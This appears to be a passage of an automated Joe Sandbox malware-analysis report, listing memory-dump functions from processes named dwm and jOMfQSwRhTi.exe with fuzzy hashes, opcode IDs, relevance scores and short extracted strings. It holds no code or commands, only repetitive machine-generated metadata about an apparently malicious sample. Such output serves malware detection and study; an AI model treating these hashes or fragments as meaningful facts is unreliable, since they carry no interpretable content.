Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a7eb4ebf9a338714afb8e874c4785d71291dfa52275a2b9eb9447c26ab36fb
Instruction ID: 0a4d8491278067f7bc06bfe2612536817453b2d3f899169422ef463b49dcb886
Opcode Fuzzy Hash: 11a7eb4ebf9a338714afb8e874c4785d71291dfa52275a2b9eb9447c26ab36fb
Instruction Fuzzy Hash: 2DF0493085D2888FDB12AF2488542AD7FB0BF16200F4500BAD408C6192EA389958C742

Function 00007FF887B192AD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d70b984ceaaee7e0df06aecb52adc016674dd4938a6f31626401d7a7f9757cb
Instruction ID: ea61d5c9f5ef170cd4079c4b528193c6ff566f53ab7c6c13f25cb8e48ce35b95
Opcode Fuzzy Hash: 0d70b984ceaaee7e0df06aecb52adc016674dd4938a6f31626401d7a7f9757cb
Instruction Fuzzy Hash: BAF09A308586CD8FDB55EF6488886ED7BB0FF1A300F4605FAE418C20A2EB3895A0CB41

Function 00007FF887B20789 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69579c1169a2511760b1300a329a2bdc1fc68cb1ca2966dbb427d02dd337ca5d
Instruction ID: a42b1508c6e65160bd48d3ffd2d66fa366a9e5d7c4bde35e3dcb13b08b8b1292
Opcode Fuzzy Hash: 69579c1169a2511760b1300a329a2bdc1fc68cb1ca2966dbb427d02dd337ca5d
Instruction Fuzzy Hash: A6F0E23089E3888FCB42AB248C582FC7FB0FF16300F4504E7D818C60A3E6384558CB02

Function 00007FF887B2C299 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a091f5d74af1f23fdfb5fd8d0ea9afafdd36e32176039d11f163396d51a3e6c
Instruction ID: 2defaf5cb0a04090bee410db9cd3ab3b90f978f3760fcc569e15ef22bde2d1a7
Opcode Fuzzy Hash: 6a091f5d74af1f23fdfb5fd8d0ea9afafdd36e32176039d11f163396d51a3e6c
Instruction Fuzzy Hash: 76F03A3189E3C85FD712AB6488582AC7FB0EF1A340F4504F7D408C6193DA289548C702

Function 00007FF887B26525 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57fa867ceab3c9e4710a2b2a29d0c0aaacf2c2e30d963c81a528ff4da4ed901
Instruction ID: d0f84567b4ec734a094c869376836cb6be1b8beb942c2a106e0e3dafa57766b1
Opcode Fuzzy Hash: e57fa867ceab3c9e4710a2b2a29d0c0aaacf2c2e30d963c81a528ff4da4ed901
Instruction Fuzzy Hash: 93E0ED318AE28C8FDB16AF2498242ED3B70FF46344F4401BAE41883492EA6D9528C742

Function 00007FF887B1E63D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587ef3d0b71c210e8940648e13e0b143229dc2c1d3d44c9340443d8670b35736
Instruction ID: a6b957cd6e00d695d8ed325967a78fae3268cc81f58b972dd4efd5b418d6b434
Opcode Fuzzy Hash: 587ef3d0b71c210e8940648e13e0b143229dc2c1d3d44c9340443d8670b35736
Instruction Fuzzy Hash: 01F0B431C8D6C9CFEB55AA6489196EC7BA0FF16340F4804BBD44CC6093DE2C5554C752

Function 00007FF887B18328 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0561a330f47bd3a52549267c0e078a266200dc6ce3272bcbb7834543b83061
Instruction ID: 2403ee7b0726365953cee22859d953819f53566d5dacee3ab15379f675f979aa
Opcode Fuzzy Hash: cf0561a330f47bd3a52549267c0e078a266200dc6ce3272bcbb7834543b83061
Instruction Fuzzy Hash: 97F039308A858D9FEB50EFA498486FD77B4FF19340F4104B6E81DC2190DA38A1A0CB41

Function 00007FF887B18BA0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 991c037b7991f30f4e97a4019db1a181bab19f8ce6d1decf52aab6c622098aa6
Instruction ID: 2670c8f32c49861010c7953fcf45a04b4fae429ad616ec9055f3c4d158f8bb86
Opcode Fuzzy Hash: 991c037b7991f30f4e97a4019db1a181bab19f8ce6d1decf52aab6c622098aa6
Instruction Fuzzy Hash: 47E0C97195898D9AEB40EF64D8496EE77B4FB08354F404476B81DC2191DA34A6A4CA41

Function 00007FF887B181C0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a42280bacf844a512a4f256d697cd6f64206417969b7003d8fb1e869e8e7bd
Instruction ID: 4db5d123f146c35b42051807ac0901eb7876f371bb5d647583e24549154b055e
Opcode Fuzzy Hash: 60a42280bacf844a512a4f256d697cd6f64206417969b7003d8fb1e869e8e7bd
Instruction Fuzzy Hash: 02E0ED3084964ECFDB54AF6498812FE36B6FF54354F50053AE41DC2191DB39E564C791

Function 00007FF887B11250 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction ID: 886c6376c04ad545925b85be30056381f7cf47beab21bdba5bda79e73227ef70
Opcode Fuzzy Hash: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction Fuzzy Hash: C2F0393199810ECBEB54EA40D8909FE73B6BF95380F100279D01AD2296DE786904CAA0

Function 00007FF887B2265D Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1923d6a73c21ac888bfbdd68bc91bcac610eb741491419eb4a65960b154e9463
Instruction ID: 34f928d3ad719fcdecec6bc0fe16f342ebd10eebb9990b574e1f67ef664e4288
Opcode Fuzzy Hash: 1923d6a73c21ac888bfbdd68bc91bcac610eb741491419eb4a65960b154e9463
Instruction Fuzzy Hash: B3E0653189E2CD4FD725AE6098512ED7B71FF05340F8605B6E428C2192DF699568C742

Function 00007FF887B10C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 3ae4450825d88ecef7882539c3b9be0faa593e5c370ee2d9cbe397e0fed440bf
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: 48E01234DCE5078AE710AB1488945FF7376FF51391F105931E43AC218ADD3C6145CEA0

Function 00007FF887B2BB0D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd336b397466fc2d21faaaf9a3700c8015e27ffa2f63cca99ec17aa59b7d5f45
Instruction ID: 76623604fa0bdc63fbe95418858c818fe2bae1e472faf7d08b16d93de61d7a63
Opcode Fuzzy Hash: dd336b397466fc2d21faaaf9a3700c8015e27ffa2f63cca99ec17aa59b7d5f45
Instruction Fuzzy Hash: 93E06D3288F3898FD725AE6098566EE3B30FF05244F4501BAE55847586EE399628C742

Function 00007FF887B1FF48 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6db65efbf1ed9a395cf168b4727d8108737ea153f7302d959e23c9d3436f6b
Instruction ID: 50521b877b81d9bf25d5174aaafb23d7559adf86646eaa5067b36cb1ee35f141
Opcode Fuzzy Hash: 0b6db65efbf1ed9a395cf168b4727d8108737ea153f7302d959e23c9d3436f6b
Instruction Fuzzy Hash: 42E08C35A2451E4FEB00EF88E841AEEB3B1FB81320F400536E41DD3281CA79A9408791

Function 00007FF887B10C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 662f5893428c6a8c2b0fc4cc33ff4ff0562454e6a488f81f6694a2ff83d5ffe8
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 62E0BF34D8950B8AE710AB54C8446BE7376FB51351F105635D435C6285DE3C6545CF90

Function 00007FF887B1114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: c602414b45de28963ac86aa61eca2f2777105b65ef7f8deb6ec32c5f96159b89
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 2BE0EC31A4451ECFDB14EF40C8949FE73B2FB95390F000A79D426D7295DBB86504CB90

Function 00007FF887B10BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: 68713903ec9445f1b9161091e1b627fb26878a00bca52931f1a42d361785b16b
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: 66E01234D4950ACBE710EB44C8446BE7371FB50351F108226D426C7289DA3CA545CF90

Function 00007FF887B1141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0d217b6c1f838dbcf64b8df007a48bbab95310f3e496df76d1fc00d07e02c5
Instruction ID: 2f2b535a0e9aa9197c253c08db03789c8486a68f18bd50dca516e6e2688266f0
Opcode Fuzzy Hash: 5e0d217b6c1f838dbcf64b8df007a48bbab95310f3e496df76d1fc00d07e02c5
Instruction Fuzzy Hash: CBD0927095862E9EEB90DB58C448BBDB6F0BF0A345F0041A5D01CD2181DB7815C48B52

Function 00007FF887B28E7B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd958b559435731bad215bf4f7dacaed686b15c7d74fab1d6a87c9983658b27
Instruction ID: c28c1d1f25b6b990c1d1ecce2deac36d51dd0b311e313422b3856a61e5f4d8a2
Opcode Fuzzy Hash: fcd958b559435731bad215bf4f7dacaed686b15c7d74fab1d6a87c9983658b27
Instruction Fuzzy Hash: 01D0C930ABF51795F178661141A023E65B37F55780EE4443DC15F518C1CD6DBC02E342

Function 00007FF887B27F8F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff25dd1f970ad203897cc5953fd797ca8e136283bc16fbe2fc9585004ce5707c
Instruction ID: e14501e7b941527c602fbffd86373613df11d506b92f7b2936835fc9d97f9d23
Opcode Fuzzy Hash: ff25dd1f970ad203897cc5953fd797ca8e136283bc16fbe2fc9585004ce5707c
Instruction Fuzzy Hash: E2C09B50F6F3C35BF72111B40CD10BD06632F563817E50571D546451C3DC4C6C45D655

Function 00007FF887B1147E Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction ID: b0e72d3b5b8e03cd8fe9da6d7fc2d966367d06183e4d9f8e15cc85aaa06289b3
Opcode Fuzzy Hash: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction Fuzzy Hash: A2B09230C5801A8AE7809A40D8906BD7272BF41380F100135E419E2181CB782900C790

Non-executed Functions

Function 00007FF887B11980 Relevance: 7.8, Strings: 6, Instructions: 253COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B11B09
r6y, xrefs: 00007FF887B11B4F
"9y, xrefs: 00007FF887B11A92
r6y, xrefs: 00007FF887B11AE6
r6y, xrefs: 00007FF887B11B2C
b4y, xrefs: 00007FF887B11BAB

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: f624bbcc44f5ffed2c07c3025ee96ec0bc62203dd6480967b15fa46dd9ce0d99
Instruction ID: 081c61119d971813ab2c1c9e0780ce9484456cca90697b21d780b667cf7a1bf0
Opcode Fuzzy Hash: f624bbcc44f5ffed2c07c3025ee96ec0bc62203dd6480967b15fa46dd9ce0d99
Instruction Fuzzy Hash: 11919A31D18A8D8FEB99DB68D8957AD7FF1FF9A350F40017AC00DC7282DA682815CB51

Function 00007FF887B119FD Relevance: 7.7, Strings: 6, Instructions: 239COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B11B09
r6y, xrefs: 00007FF887B11B4F
"9y, xrefs: 00007FF887B11A92
r6y, xrefs: 00007FF887B11AE6
r6y, xrefs: 00007FF887B11B2C
b4y, xrefs: 00007FF887B11BAB

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: 3c9e4abede4f3191ca7f77d6f889c41223c895e6e795b0b7d7f1a199239d168b
Instruction ID: 065d08018d15695f60127a243a2405da1509084bb82494bd660d8eaf7d7385a6
Opcode Fuzzy Hash: 3c9e4abede4f3191ca7f77d6f889c41223c895e6e795b0b7d7f1a199239d168b
Instruction Fuzzy Hash: 8681AC31D18A8D8FEB99DB68D8557AD7BF1FF9A310F50017AC00DD7282DA382815CB51

Function 00007FF887B286FA Relevance: 7.6, Strings: 6, Instructions: 83COMMON

Download Yara Rule

Strings

M_^=, xrefs: 00007FF887B286FA
M_^], xrefs: 00007FF887B2877A
M_^q, xrefs: 00007FF887B287C9
M_^g, xrefs: 00007FF887B287A2
M_^C, xrefs: 00007FF887B28712
M_^o, xrefs: 00007FF887B287C2

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: M_^=$M_^C$M_^]$M_^g$M_^o$M_^q
API String ID: 0-66519017
Opcode ID: f65de0eb6eff9af8662e7edeef6be91e13052f862f0cb6055ddad84037a04565
Instruction ID: eb2c1ec725aa79a64144e33b24d1a0251f28b701c759b23db5ea2023ed5c1165
Opcode Fuzzy Hash: f65de0eb6eff9af8662e7edeef6be91e13052f862f0cb6055ddad84037a04565
Instruction Fuzzy Hash: 9C216D77619828C59B557AACBC452EC3780DF523B9B4407B2E93CC6083FD28644785C6

Function 00007FF887B286F8 Relevance: 6.3, Strings: 5, Instructions: 86COMMON

Download Yara Rule

Strings

M_^], xrefs: 00007FF887B2877A
M_^q, xrefs: 00007FF887B287C9
M_^g, xrefs: 00007FF887B287A2
M_^C, xrefs: 00007FF887B28712
M_^o, xrefs: 00007FF887B287C2

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: M_^C$M_^]$M_^g$M_^o$M_^q
API String ID: 0-1280918610
Opcode ID: 241cfe1488a7f252ffe25ca63be1a1ed9edaa464d99090fbae0c8742ea2782d5
Instruction ID: 526be6d85972df82882cc0fd871dd7afb9722d7167fbc1f96f5cedca68997d1b
Opcode Fuzzy Hash: 241cfe1488a7f252ffe25ca63be1a1ed9edaa464d99090fbae0c8742ea2782d5
Instruction Fuzzy Hash: 57218B73619829C59A153AACBC452EC3740DB523B5B440BB3E93CCA083ED28744785C6

Function 00007FF887B1B64D Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

X, xrefs: 00007FF887B1B577
Y, xrefs: 00007FF887B1B6F0
`, xrefs: 00007FF887B1B6B5
H, xrefs: 00007FF887B1B4BB
u, xrefs: 00007FF887B1B4AE

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1b000_dwm.jbxd

Similarity

API ID:
String ID: H$X$Y$`$u
API String ID: 0-4051370763
Opcode ID: 1c0af152f8002e7e40a97178dde3db1948ee87e1e9515c4d6c788bc8b501c3a0
Instruction ID: b42593b97ccf3179a6e8beaa0bb669e9f40cbfc94ab96e1f5eecb6612353d4be
Opcode Fuzzy Hash: 1c0af152f8002e7e40a97178dde3db1948ee87e1e9515c4d6c788bc8b501c3a0
Instruction Fuzzy Hash: C241A470D096698FEBA4DF14C8987ADB6B2BF14345F1041EAD40DE7291CB386E84CF10

Function 00007FF887B249E0 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

b4y, xrefs: 00007FF887B2A0A2
r6y, xrefs: 00007FF887B2A441
r6y, xrefs: 00007FF887B2A183
r6y, xrefs: 00007FF887B2A102

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: b4y$r6y$r6y$r6y
API String ID: 0-2388845383
Opcode ID: 4494b933c2eeb6d6d27e6807c5e8a9f851bfcbfc3b34f068a48eac8b067dc5d4
Instruction ID: 9a028502eafbe2db0dadc130464e1d5e20d488ee4cb098d882ef7d4cc0a375fb
Opcode Fuzzy Hash: 4494b933c2eeb6d6d27e6807c5e8a9f851bfcbfc3b34f068a48eac8b067dc5d4
Instruction Fuzzy Hash: 0021F02B79EA2A06E65471ADFC554FC7B14DFC33B274807B7E249C9182CC19584B82AA

Analysis Process: jOMfQSwRhTi.exePID: 4712, Parent PID: 3504COMMON

Executed Functions

Function 00007FF886E31519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1688801983.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff886e30000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027ce74fd34b70a8232bffe78bb3ef2da71249664dedc349d62145a548015fb1
Instruction ID: 56786a0f0be11c42d2a4e4c38d7776eb241f965bcb7e05d210f013e4e000283c
Opcode Fuzzy Hash: 027ce74fd34b70a8232bffe78bb3ef2da71249664dedc349d62145a548015fb1
Instruction Fuzzy Hash: A2413571D2860E8FEB94EB98C6546FDBBF1FF59350F64017AD00AE7292CA386944CB40

Function 00007FF886E30510 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1688801983.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff886e30000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad854ea39ab4bd357b3d72cfca867db4b4498cccf2a984a15386fecccefb1bf
Instruction ID: fd9b385e998a9f7882a2c746cc375f71ae95f96c07eac3632f4ea3721dbf4499
Opcode Fuzzy Hash: fad854ea39ab4bd357b3d72cfca867db4b4498cccf2a984a15386fecccefb1bf
Instruction Fuzzy Hash: 7731A17291C1A756E7117FF8B4552E97BA0EF623B9F188273E08C89083DD2C6496C386

Function 00007FF886E3162F Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1688801983.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff886e30000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7eded9a484db0bb7c56c4917212b04f228970e598b33844a149ef2fbf2375b
Instruction ID: 4c018bbdacf16edd561daa3edeff797b99db62572917ff90436358599d01b8ad
Opcode Fuzzy Hash: 1e7eded9a484db0bb7c56c4917212b04f228970e598b33844a149ef2fbf2375b
Instruction Fuzzy Hash: 2E21B371D1851E8FEB98EB98C594AEDBBF1FF58351F24417AD00AE7291DA386980CB40

Function 00007FF886E31085 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1688801983.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff886e30000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 373924d16aa68e383ae74d01fcd87e3df3d8193bd1b75f26e3dc3f1d44b71154
Instruction ID: 475b74912db24bdd5d6816fbe501fca7c444baac84ca11b8427bc61ad4a4c441
Opcode Fuzzy Hash: 373924d16aa68e383ae74d01fcd87e3df3d8193bd1b75f26e3dc3f1d44b71154
Instruction Fuzzy Hash: A5112136A4C65BCBDB21AA58E9502FF73A0FFC53A0F11067EC449D7181DF6C2919C680

Function 00007FF886E30E40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1688801983.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff886e30000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88da8eedddfe94225f75291e8bad72d6fbe3b0243f74c7295aa31490765cd0f9
Instruction ID: 725a420680c9e7b7bd33c19abb458c8e38230a26e5a7fe57192b6b3a6b7d37da
Opcode Fuzzy Hash: 88da8eedddfe94225f75291e8bad72d6fbe3b0243f74c7295aa31490765cd0f9
Instruction Fuzzy Hash: 1D218175E0D38B8FEB429AA5C9142FA7BF1BF16341F240276C045D61D2DA3C6909CB91

Function 00007FF886E30580 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1688801983.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff886e30000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb7b5e5b9f458f282fae41539cc568b676f210190000de7ee7a9b24a5d799f0
Instruction ID: 35d7cc6deb364f89a9c5d293783daf111aed271c9729ddbb8b750992021bef4b
Opcode Fuzzy Hash: 0cb7b5e5b9f458f282fae41539cc568b676f210190000de7ee7a9b24a5d799f0
Instruction Fuzzy Hash: D511E97191C19B5BE701BFFCA4552FA7BA0EF56364F188677E44C89083DE2C7494C682

Function 00007FF886E30DC9 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1688801983.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff886e30000_jOMfQSwRhTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02cfeaef0c831ba7de4c0ba12d9a636097848f1e78f386ffbcac8eb69c454bf
Instruction ID: bd394a2e6ce3a50aaa7b7fecd6dc2377a4249b5005cde142126b527ba4071f8a
Opcode Fuzzy Hash: b02cfeaef0c831ba7de4c0ba12d9a636097848f1e78f386ffbcac8eb69c454bf
Instruction Fuzzy Hash: ED112B70E0D34BCFEB129BA5CA182FE7BB1BF45351F244576C015962D2DA3C6A45CB81

Function 00007FF886E30FC5 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

